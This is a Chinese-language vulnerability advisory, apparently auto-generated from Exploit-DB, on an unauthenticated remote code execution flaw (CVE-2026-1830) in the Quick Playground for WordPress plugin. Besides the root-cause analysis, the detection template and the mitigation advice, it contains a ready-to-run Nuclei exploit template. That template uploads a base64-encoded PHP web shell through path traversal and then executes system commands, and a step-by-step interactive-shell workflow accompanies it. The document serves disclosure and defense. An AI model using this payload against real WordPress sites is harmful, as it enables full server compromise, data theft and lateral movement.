[webapps] Quick Playground for WordPress 1.3.1 - Unauthenticated Remote Code Execution

📋 漏洞基础信息

🔬 漏洞根因

REST API端点/wp-json/quickplayground/v1/upload_image/{profile}在save_image函数中仅通过sync_code验证（if($code == $sync_code) return true;），未进行WordPress会话认证或权限检查，且未对filename参数做路径过滤，允许../../../路径遍历。

🎯 攻击场景

1. 攻击者获取或猜测sync_code（弱/泄露/可预测）；2. 构造POST请求到/wp-json/quickplayground/v1/upload_image/{profile}，json body包含sync_code、filename（含路径遍历）和base64编码的PHP webshell；3. 文件被写入web可访问目录；4. 访问webshell URL并传参cmd执行系统命令。

💥 漏洞影响

未认证攻击者可上传任意PHP文件，导致远程代码执行，完全控制WordPress站点，可能导致数据泄露、服务器沦陷、进一步横向移动。

⚔️ Nuclei Exploit 模板

以下为标准 Nuclei v3 格式的利用模板，可直接用于漏洞验证：

id: CVE-2026-1830-exploit

info:
  name: Quick Playground for WordPress <= 1.3.1 - Unauthenticated RCE
  author: cardosource
  severity: critical
  description: Exploit for CVE-2026-1830 allowing unauthenticated remote code execution via arbitrary file upload.
  reference:
    - https://www.exploit-db.com/exploits/XXXXX
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-1830
  metadata:
    max-request: 2

variables:
  sync_code: 'exploit123'
  profile: 'default'
  filename: 'pwned.php'
  cmd: 'id'

http:
  - raw:
      - |
        POST /wp-json/quickplayground/v1/upload_image/{{profile}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0
        Content-Type: application/json

        {"sync_code":"{{sync_code}}","filename":"../../../{{filename}}","base64":"PD9waHAgJGNtZD0kX0dFVFsnY21kJ107c3lzdGVtKCRjbWQpOyA/Pg=="}

    matchers:
      - type: word
        part: body
        words:
          - 'saving to'
        negative: false

    extractors:
      - type: regex
        part: body
        name: message
        regex:
          - '"message":"(.*?)"'
        group: 1

  - raw:
      - |
        GET /{{filename}}?cmd={{cmd}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0

    matchers:
      - type: word
        part: body
        words:
          - 'uid='
          - 'root:x:'
        condition: or

    extractors:
      - type: regex
        part: body
        name: output
        regex:
          - '(.*?)$'
        group: 1

🔬 深度技术分析

1. 设置目标URL和sync_code（在本地实验室中通过wp option update qckply_sync_code_default设置为'exploit123'）；2. 生成随机8字符小写文件名加.php后缀；3. 构造web shell PHP代码；4. 创建json payload：sync_code、包含../../路径遍历的filename、base64编码的shell；5. POST到上传端点；6. 解析响应，若包含'saving to'则上传成功；7. 访问上传文件URL并传参cmd=id执行命令，检查响应中<pre>标签内容确认RCE；8. 进入交互式shell循环。

🔍 Nuclei Detection 模板

以下为漏洞探测模板，用于判断目标是否受影响：

id: CVE-2026-1830-detection

info:
  name: Quick Playground for WordPress <= 1.3.1 - Detection
  author: cardosource
  severity: info
  description: Detects Quick Playground plugin version <= 1.3.1 by checking the REST API endpoint
  reference:
    - https://www.exploit-db.com/exploits/XXXXX
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-1830

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-json/quickplayground/v1/upload_image/default'
    headers:
      User-Agent: Mozilla/5.0
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'rest_no_route'
          - 'No route was found matching the URL and request method'
        condition: or
        negative: true
      - type: status
        status:
          - 200
          - 400
        condition: or
    extractors:
      - type: regex
        part: header
        name: plugin_version
        regex:
          - 'X-Plugin-Version: ([0-9.]+)'
        group: 1

🛡️ 修复建议

暂无官方补丁，建议升级到>1.3.1版本（如有）；临时措施：禁用插件，或使用Web应用防火墙规则拦截对/wp-json/quickplayground/v1/upload_image/的POST请求，或通过.htaccess限制该端点仅允许已认证用户访问。

📎 参考链接

• https://www.cve.org/CVERecord?id=CVE-2026-1830
• https://packetstormsecurity.com/files/183554/
• Exploit-DB 原文

🚨 威胁评估

⚠️ 本文基于公开漏洞数据库，仅供安全研究与防御参考。生成时间: 2026-05-31 08:10 | 来源: Exploit-DB